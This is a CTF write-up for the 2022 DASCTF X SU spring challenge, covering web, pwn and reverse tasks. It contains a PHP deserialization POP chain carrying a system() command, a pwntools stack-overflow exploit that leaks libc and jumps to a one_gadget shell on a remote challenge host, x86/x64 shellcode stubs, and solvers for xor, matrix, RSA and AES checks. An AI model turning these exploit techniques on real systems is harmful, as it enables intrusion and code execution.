2022DASCTF X SU 三月春季挑战赛
date
Mar 27, 2022
tags
CTF
WriteUP
Web
ezpop
到tostring调用,最后到call()函数调用get_flag()
// POP chain for the ezpop challenge. The class definitions are not reproduced in
// this writeup, so the trigger order described in the comments is the author's
// account of the source and cannot be checked here.
$s=new fin();
$s->f1=new what(); // f1 of the outer fin is a `what`; when the fin is destroyed its __destruct() fires
$s->f1->a=new fin(); // $s->f1: __destruct() leads to __toString() on this nested fin
$s->f1->a->f1=new crow();
$s->f1->a->f1->v1=new fin();// $s->f1->a->f1: __destruct() -> __toString() -> __invoke() (fires because `a` is an object)
$s->f1->a->f1->v1->f1=new mix();// $s->f1->a->f1->v1: __destruct() -> __toString() -> __invoke() (because `a` is an object) -> __call($a, $b)
// m1 carries the string the final __call() hands on; how it reaches execution
// depends on the class code, which is not shown.
$s->f1->a->f1->v1->f1->m1="?><?php system('grep -rni flag');?>";
//var_dump($s);
// Serialized and URL-encoded so the chain can be pasted straight into the request parameter.
echo urlencode(serialize($s));
Misc
月圆之夜
视频里有字母表,对着写得到flag{welcometothefullmoonnight}
Crypto
Pwn
checkin
题目给了一个read栈溢出,padding 0xa0,没有给write,
解题思路,利用onegadget,爆破
# _*_ coding:utf-8 _*_
from pwn import *
import os
# Target setup: amd64/Linux with verbose pwntools logging. The local-process
# line is kept as a comment for offline debugging against the binary.
context.update(os='linux', arch='amd64', log_level='debug')
#p=process("checkin")
p = remote("node4.buuoj.cn", "29937")
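def debug(addr, PIE=True):
    """Attach gdb to the global tube ``p`` with a breakpoint at each address in ``addr``.

    Args:
        addr: iterable of breakpoint addresses. With PIE=True they are offsets
            from the process' lowest mapping; otherwise absolute addresses.
        PIE: when True, read the base address from ``pmap`` (second output
            line, first column) and add it to every offset.
    """
    if PIE:
        # pmap's first line is a header, the second is the lowest mapping,
        # which this helper treats as the text base. The pipe is closed by the
        # context manager instead of being left to the garbage collector.
        with os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)) as pipe:
            text_base = int(pipe.readlines()[1], 16)
    else:
        text_base = 0
    # One "b *addr" line per breakpoint, fed to gdb as its start-up script.
    debug_str = ''.join('b *{}\n'.format(hex(text_base + i)) for i in addr)
    gdb.attach(p, debug_str)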
def dbg():
    """Attach gdb to the global tube ``p`` without any initial breakpoints."""
    gdb.attach(target=p)
#-----------------------------------------------------------------------------------------
# Thin wrappers around the global tube ``p`` so the exploit body stays short.
# NOTE(review): the *after helpers apply str() to delimiter and data exactly as
# in the author's template; on Python 3 str(b'..') yields the text "b'..'", so
# these are only safe to call with str arguments.
def s(data):
    # in case that data is an int (author's note)
    return p.send(data)


def sa(delim, data):
    return p.sendafter(str(delim), str(data))


def sl(data):
    return p.sendline(str(data))


def sla(delim, data):
    return p.sendlineafter(str(delim), str(data))


def r(numb=4096):
    return p.recv(numb)


def ru(delims):
    # Short timeout so a missing delimiter does not hang the exploit.
    return p.recvuntil(delims, timeout=0.2)


def it():
    return p.interactive()


def uu32(data):
    return u32(data.ljust(4, '\0'))


def uu64(data):
    return u64(data.ljust(8, '\0'))


def bp(bkp):
    # NOTE(review): ``pdbg`` is not defined anywhere in this script, so calling
    # bp() raises NameError; kept as in the template.
    return pdbg.bp(bkp)


def li(str1, data1):
    return log.success(str1 + '========>' + hex(data1))
def dbgc(addr):
    """Attach gdb to ``p``, break at the absolute address ``addr`` and continue."""
    script = "b*{}\n c".format(hex(addr))
    gdb.attach(p, script)
def lg(s):
    """Log ``s`` together with the hex value of the global it names, e.g. lg("libc_base").

    ``s`` is passed to ``eval`` in this module's scope, so only literal variable
    names written in this script belong here -- never text taken from the
    target's output.
    """
    value = eval(s)
    line = '\033[1;31;40m %s --> 0x%x \033[0m' % (s, value)
    log.info(line)
# Generic shellcode stubs carried over from the author's template (source noted
# below). None of them is referenced by this exploit -- the chain further down
# returns into a libc one_gadget instead.
sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
#0xe3b2e execve("/bin/sh", r15, r12)
#constraints:
# [r15] == NULL || r15 == NULL
# [r12] == NULL || r12 == NULL
# 0xe3b31 execve("/bin/sh", r15, rdx)
# constraints:
# [r15] == NULL || r15 == NULL
# [rdx] == NULL || rdx == NULL
# 0xe3b34 execve("/bin/sh", rsi, rdx)
# constraints:
# [rsi] == NULL || rsi == NULL
# [rdx] == NULL || rdx == NULL
# pop_rdi_ret=0x401253
# pop_r15_ret=0x401252
# addr_plt_start=0x401020
# fuck=[0xe3b2e,0xe3b31,0xe3b34]
# Stage 1: 0xa0 bytes of padding (the overflow size noted above), then two
# qwords. By the usual frame layout these would be the saved rbp and the return
# address; the binary is not part of the writeup, so this is inferred.
# NOTE(review): the target 0x4011BF is reused by every stage below; it is
# presumably the routine that performs the read -- confirm against the binary.
pay = b'\x00'*0xa0 + p64(0x4040c0+0xa0) +p64(0x4011BF)
s(pay)
sleep(0.1)
# Stage 2: a list of addresses packed back to back. The inline labels are the
# author's ("pop 6" gadget, stdout, rbp); they cannot be verified here.
pay = flat([
0x404140,
0x40124A, # pop 6
0,1,
0x404040, # stdout
0,0,
0x404020,
0x401230,
0,0,
0x404140, #rbp
0,0,0,0,
0x4011BF
])
# Padded to 0xa0 again so the two trailing qwords land at the same offsets as
# in stage 1, this time with 0x404020+0xa0 in the rbp slot.
pay = pay.ljust(0xa0,b'\x00') + p64(0x404020+0xa0) +p64(0x4011BF)
s(pay)
sleep(0.1)
# Two raw bytes sent on their own (0x0450 little-endian); what they overwrite
# is not visible in the writeup.
s('\x50\x04')
# Leak: read up to the first 0x7f byte, take the last 6 bytes as a libc
# pointer and subtract the author's offset 0x1ed6a0 to get the libc base.
libc_base = u64(ru('\x7f')[-6:].ljust(8,b'\x00')) - 0x1ed6a0
lg("libc_base")
# one_gadget offset 0xe3b2e -- see the constraints listed in the comment block
# above; the other two candidates there are left unused.
og_addr = libc_base + 0xe3b2e
sleep(0.1)
print("one = "+hex(og_addr))
# Final stage: same padding, then the one_gadget address in both trailing slots.
s(b'a'*0xa0+p64(og_addr)+p64(og_addr))
it()
Reverse
easyRe
调试时 dump 出 sbox,再做 xor 即可
# 42 signed bytes dumped from the binary during debugging, kept exactly as the
# decompiler printed them (signed char values).
v2 = [
    -61, -128, -43, -14, -101, 48, 11, -76, 85, -34, 34, -125, 47, -105,
    -72, 32, 29, 116, -47, 1, 115, 26, -78, -56, -59, 116, -64, 91, -9, 15,
    -45, 1, 85, -78, -92, -82, 123, -84, 92, 86, -68, 35,
]
# Dumped xor table; only the first len(v2) entries take part in the recovery,
# the rest is whatever followed it in memory.
ARR = [0x00000038, 0x00000078, 0x000000DD, 0x000000E8, 0x00000000, 0x000000AF, 0x000000BF, 0x0000003A, 0x0000006B, 0x000000FB, 0x000000B8, 0x0000000C, 0x00000085, 0x00000035, 0x0000015C, 0x000000AD, 0x000000E6, 0x00000000, 0x000000E0, 0x0000008A, 0x0000001D, 0x000000BD, 0x00000146, 0xFFFFFFD2, 0x0000002B, 0x00000000, 0x00000015, 0x00000024, 0x000000C6, 0x000000AD, 0x000000A1, 0x000000C9, 0x0000007B, 0x00000012, 0x00000028, 0x00000000, 0x00000005, 0x00000000, 0x00000072, 0x0000003E, 0x00000010, 0x000000A1, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000001, 0x00000001, 0x00000000, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000001, 0x00000000, 0x006DFD80, 0x00000001, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000]
# Undo the check one byte at a time: subtract 0x47, xor with the table entry
# at the same index and keep the low byte. zip() stops at len(v2), which is
# exactly the enumerate-over-v2 range.
flag = bytearray(
    ((value - 0x47) ^ mask) & 0xff for value, mask in zip(v2, ARR)
)
print(flag)
login
server 和 client
linux syscall
第一步:过掉token和password check
check1
解password
# Two 6x6 integer matrices lifted from the binary: v6 is the coefficient matrix
# and v7 the expected product, so the password is the solution b of v6 * b = v7.
# matrix/ZZ come from Sage; this snippet is meant to run in a Sage session.
v6 = matrix(ZZ, [
    [113, 219, 37, 46, 122, 15],
    [76, 163, 106, 34, 170, 41],
    [110, 27, 169, 122, 138, 39],
    [47, 128, 240, 14, 170, 86],
    [247, 89, 88, 0, 169, 242],
    [246, 154, 78, 28, 72, 201],
])
v7 = matrix(ZZ, [
    [163, 151, 162, 85, 83, 190],
    [241, 252, 249, 121, 107, 82],
    [20, 19, 233, 226, 45, 81],
    [142, 31, 86, 8, 87, 39],
    [167, 5, 212, 208, 82, 130],
    [119, 117, 27, 153, 74, 237],
])
b = v6.solve_right(v7)
# Walk the solution row by row and fold every entry into a byte. The modulus
# 0x101 is taken from the author's analysis of the check, which is not shown here.
pwd = bytearray(entry % 0x101 for row in b for entry in row)
print(pwd.hex())
rsa
import gmpy2
from Crypto.Util.number import long_to_bytes, bytes_to_long
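# RSA parameters recovered from the binary. ``c`` is the fixed challenge
# sentence read as a big-endian integer; the printed value m = c^d mod n is the
# RSA signature of that sentence, which the checker verifies by computing
# m^e mod n and comparing it with the sentence.
# NOTE(review): the C++ verifier further down parses the sentence byte-reversed
# (little-endian); confirm the byte order agrees before relying on this token.
p = 98197216341757567488149177586991336976901080454854408243068885480633972200382596026756300968618883148721598031574296054706280190113587145906781375704611841087782526897314537785060868780928063942914187241017272444601926795083433477673935377466676026146695321415853502288291409333200661670651818749836420808033
q = 133639826298015917901017908376475546339925646165363264658181838203059432536492968144231040597990919971381628901127402671873954769629458944972912180415794436700950304720548263026421362847590283353425105178540468631051824814390421486132775876582962969734956410033443729557703719598998956317920674659744121941513
e = 65537
c = int.from_bytes(b'By reading we enrich the mind, by conversation we polish it.', byteorder="big")
n = p * q
phi_n = (p - 1) * (q - 1)
# Modular inverse via three-argument pow (Python 3.8+) rather than gmpy2, so the
# snippet runs on a plain interpreter. Raises ValueError if e and phi_n share a
# factor, where gmpy2.invert would raise ZeroDivisionError.
d = pow(e, -1, phi_n)
m = pow(c, d, n)
print(m)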
解token
#include<iostream>
#include<fstream>
#include<assert.h>
#include<time.h>
#include<gmp.h>
#include<cstdio>
using namespace std;
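int main() {
    mpz_t data, e, m, n;
    // v1: expected value as hex. It reads as the challenge sentence with its
    // bytes reversed (".ti hsilop ew ..."), i.e. the text as a little-endian
    // integer. v8: public exponent in hex (0x10001 = 65537). inp: the token
    // under test and v9: the RSA modulus, both decimal.
    char v1[] = "2e7469206873696c6f70206577206e6f697461737265766e6f63207962202c646e696d2065687420686369726e6520657720676e6964616572207942";
    char v8[] = "10001";
    char inp[] = "11963777321199993924175387978397443935563034091716786597947508874393819454915798980986262132792605021295930274531653741552766395859285325677395421549163602968276475448835066393456449574469736327622969755801884982386140722904578598391534204834007447860153096480268812700725451958035204357033892179559153729604237187552716580637492579876006993181920209114166153317182827927606249871955662032809256743464460825303610341043145126848787575238499023185150429072724679210155061579052743238859739734301162335989939278904459012917375108407803445722785027315562371588439877746983153339473213449448259686486917983129418859935686";
    char v9[] = "13123058934861171416713230498081453101147538789122070079961388806126697916963123413431108069961369055630747412550900239402710827847917960870358653962948282381351741121884528399369764530446509936240262290248305226552117100584726616255292963971141510518678552679033220315246377746270515853987903184512948801397452104554589803725619076066339968999308910127885089547678968793196148780382182445270838659078189316664538631875879022325427220682805580410213245364855569367702919157881367085677283124732874621569379901272662162025780608669577546548333274766058755786449491277002349918598971841605936268030140638579388226573929";
    // mpz_init_set_str returns 0 when the whole string is a valid number in
    // the given base and -1 otherwise; without the check a mistyped literal
    // would silently be compared as 0.
    int bad = 0;
    bad |= mpz_init_set_str(n, v9, 10);
    bad |= mpz_init_set_str(data, v1, 16);
    bad |= mpz_init_set_str(e, v8, 16);
    bad |= mpz_init_set_str(m, inp, 10);
    int status = 0;
    if (bad != 0) {
        cerr << "malformed integer literal" << endl;
        status = 1;
    } else {
        // Signature check: token^e mod n must equal the expected value.
        mpz_powm(m, m, e, n);
        cout << "powm: " << m << endl;
        cout << "data: " << data << endl;
        if (mpz_cmp(m, data) == 0) {
            cout << "success!" << endl;
        }
    }
    // mpz_init_set_str initialises the variable even when parsing fails, so
    // all four can be released unconditionally.
    mpz_clear(data);
    mpz_clear(e);
    mpz_clear(m);
    mpz_clear(n);
    return status;
}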
token
11963777321199993924175387978397443935563034091716786597947508874393819454915798980986262132792605021295930274531653741552766395859285325677395421549163602968276475448835066393456449574469736327622969755801884982386140722904578598391534204834007447860153096480268812700725451958035204357033892179559153729604237187552716580637492579876006993181920209114166153317182827927606249871955662032809256743464460825303610341043145126848787575238499023185150429072724679210155061579052743238859739734301162335989939278904459012917375108407803445722785027315562371588439877746983153339473213449448259686486917983129418859935686
password
5132d202c32d95b9f978d514e3294220513b15623482b4c02e9afde8bad5ec07486a5488
AES check
modify code
// SubBytes, patched for this challenge: the target's AES applies the *inverse*
// S-box in the forward round (the commented-out line is the stock tiny-AES
// statement), so the reference implementation is changed the same way.
static void SubBytes(state_t* state)
{
    uint8_t row, col;
    for (row = 0; row < 4; row++) {
        uint8_t *cell = (*state)[row];
        for (col = 0; col < 4; col++) {
            // stock line: (*state)[j][i] = getSBoxValue((*state)[j][i]);
            cell[col] = getSBoxInvert(cell[col]);
        }
    }
}
// InvSubBytes, patched to mirror the swapped SubBytes above: the inverse round
// uses the *forward* S-box (the commented-out line is the stock tiny-AES
// statement). Both functions still walk all 16 state bytes.
static void InvSubBytes(state_t* state)
{
    uint8_t row, col;
    for (row = 0; row < 4; row++) {
        uint8_t *cell = (*state)[row];
        for (col = 0; col < 4; col++) {
            // stock line: (*state)[j][i] = getSBoxInvert((*state)[j][i]);
            cell[col] = getSBoxValue(cell[col]);
        }
    }
}
aes decryption
#include <cstdint>
#include <cstdio>
#include <string>
#include "aes.h"
#define CBC 1
#define AES128 1
int main()
{
    // 48 bytes pulled from the binary. The calls below pass key as the AES key
    // and key+16 / key+32 as the IVs, so bytes 0..15 are the key and the two
    // following 16-byte groups are the per-block IVs.
    uint8_t key[48] = {0x32,0x30,0x07,0x36,0x6a,0x37,0x78,0x31,0x48,0x39,0x42,0x39,0x14,0x31,0xd5,0x32,0x62,0x36,0xf9,0x38,0x42,0x30,0xc3,0x31,0x6a,0x35,0x48,0x38,0x34,0x35,0x54,0x34,0x29,0x34,0x51,0x36,0x15,0x39,0xd2,0x38,0xd2,0x39,0x20,0x31,0xb9,0x32,0x2e,0x30};
    // 32 ciphertext bytes; the extra element stays zero so the buffer is
    // NUL-terminated once it holds the plaintext and can be printed with %s.
    uint8_t buf[32+1] = {254, 249, 231, 62, 246, 161, 35, 204, 87, 97, 193, 21, 119, 251, 156, 187, 202, 47, 177, 232, 79, 217, 7, 216, 12, 107, 234, 207, 232, 66, 162, 250};
    struct AES_ctx ctx{};
    // Each 16-byte block is decrypted on its own with its own IV: two
    // single-block CBC decryptions rather than one 32-byte chain.
    for (int block = 0; block < 2; ++block) {
        AES_init_ctx_iv(&ctx, key, key + 16 * (block + 1));
        AES_CBC_decrypt_buffer(&ctx, buf + 16 * block, 16);
    }
    for (int i = 0; i < 32; ++i) {
        printf("%02x ", buf[i]);
    }
    printf("\n");
    printf("decrypt : %s\n", (char *)buf);
    return 0;
}
get the flag